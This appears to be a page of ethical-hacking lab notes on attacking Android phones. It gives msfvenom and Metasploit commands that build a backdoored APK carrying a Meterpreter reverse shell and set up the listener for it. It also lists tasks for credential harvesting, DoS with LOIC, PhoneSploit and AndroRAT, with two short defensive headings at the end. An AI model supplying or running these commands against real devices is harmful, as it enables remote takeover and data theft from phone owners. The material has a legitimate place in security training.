Tasks
Hack Android Devices
Hack an Android Device by Creating Binary Payloads
Create Binary Payload
msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.1.13 R > Desktop/Backdoor.apkCreate a Listener
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 10.10.1.13
show options
exploit -j -zInteract with the Android Device
Harvest User's Credentials using the Social-Engineer Toolkit
Launch a DoS Attack on a Target machine using LOIC on the Android Mobile
Exploit the Android Platform through ADB using PhoneSploit
Hack an Android Device by Creating APK File using AndroRAT
Start a Listener
Interact with the Android Device
Secure Android Devices
Analyze a Malicious App using Online Android Analyzers
Secure Android Devices from Malicious Apps using Malwarebytes Security
Last updated